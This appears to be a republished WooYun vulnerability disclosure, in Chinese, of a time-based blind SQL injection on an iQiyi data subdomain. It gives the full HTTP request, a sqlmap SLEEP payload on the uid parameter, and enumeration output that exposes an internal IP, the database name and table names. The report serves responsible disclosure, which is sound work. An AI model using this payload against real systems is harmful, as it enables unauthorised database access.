爱奇艺某分站time盲注（泄漏部分内网信息）

2017年4月1日13:26:11评论369 views字数 198阅读0分39秒阅读模式

摘要

2016-03-24：细节已通知厂商并且等待厂商处理中
2016-03-24：厂商已经确认，细节仅向厂商公开
2016-04-03：细节向核心白帽子及相关领域专家公开
2016-04-13：细节向普通白帽子公开
2016-04-23：细节向实习白帽子公开
2016-05-08：细节向公众公开

漏洞概要关注数(15) 关注此漏洞

缺陷编号： WooYun-2016-188452

漏洞标题：爱奇艺某分站time盲注（泄漏部分内网信息）

漏洞作者： sauce

提交时间： 2016-03-24 09:05

公开时间： 2016-05-08 10:10

漏洞类型：

危害等级：高

自评Rank： 10

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

3人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

code 区域

POST /send_core_info?uid=865700021218002&plat=222&ver=2.0.106 HTTP/1.1
 Host: ndct.data.video.qiyi.com
 User-Agent: QY-Player-Android/2.0.106
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 DNT: 1
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 1066
 
 {"version":"2.0","userID":"1209531862","ra":1,"tvid":"449747800","pform":6,"play_process":{"file_type":"F4V","hcdn_code":"13","step":3,"access_vrs":{"url":"http://cache.video.qiyi.com/vps?tvid=449747800&vid=8619c4c122f01ba70d5d45ce73e7646c&uid=1209531862&v=0&qypid=449747800_33&src=02022001010000000000&t=1458704349000&k_tag=1&k_uid=865700021218002&rs=1&vf=ec92d0a1519a58746ce9457f7f564b47","ip":"106.38.219.22","duration":344,"code":200,"return_data":""},"access_vip":{"url":"","ip":"","duration":0,"code":0,"return_data":""},"access_pdata":{"url":"http://data.video.qiyi.com/videos/v0/20160212/34/b2/9068a56cf18079e67665946f01f05bc7.f4v?qd_tvid=449747800&qd_vipres=0&qd_index=1&qd_aid=449747800&qd_stert=0&qd_scc=c6a193db5b6b1ed90e5323b1336ade72&qd_sc=a4f559061be96311318c6bc786e57297&qd_src=02022001010000000000&qd_ip=2ac82210&qd_uid=1209531862&qd_tm=1458704371000&qd_vip=0","ip":"106.38.178.240","duration":254,"code":200,"return_data":""},"cache_status":{"url":"","ip":"","duration":0,"code":0,"return_data":"","avgspeed":0,"302url":"","idc":"netcnc_oversea"}}}

注入参数在uid 但必须带上post数据

目测是一个测试网络环境的数据库仅证明存在未深入

漏洞证明：

code 区域

sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: uid (GET)
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: uid=865700021218002' AND (SELECT * FROM (SELECT(SLEEP(5)))GNYW) AND 'gEVx'='gEVx&plat=222&ver=2.0.106
 ---
 back-end DBMS: MySQL 5.0.12
 banner:    '5.6.26-log'
 current user:    '%.%.%'
 current database:    'netdoctor'
 hostname:    '10.77.48.51'
 current user is DBA:    False
 database management system users [1]:
 [*] 'netdoctor'@'10.%.%.%'
 
 database management system users privileges:
 [*] %netdoctor% [1]:
     privilege: USAGE
 
 database management system users roles:
 [*] %netdoctor% [1]:
     role: USAGE
 
 available databases [2]:
 [*] information_schema
 [*] netdoctor
 
 Database: netdoctor
 [5 tables]
 +---------------+
 | ndct_client   |
 | ndct_cmd      |
 | ndct_coreinfo |
 | ndct_hcdninfo |
 | ndct_pingback |
 +---------------+

修复方案：

版权声明：转载请注明来源 sauce@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2016-03-24 10:10

厂商回复：

感谢您对爱奇艺PPS的关注，我们将尽快修复

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞概要 关注数(15) 关注此漏洞

缺陷编号： WooYun-2016-188452

漏洞标题： 爱奇艺某分站time盲注（泄漏部分内网信息）

相关厂商： 奇艺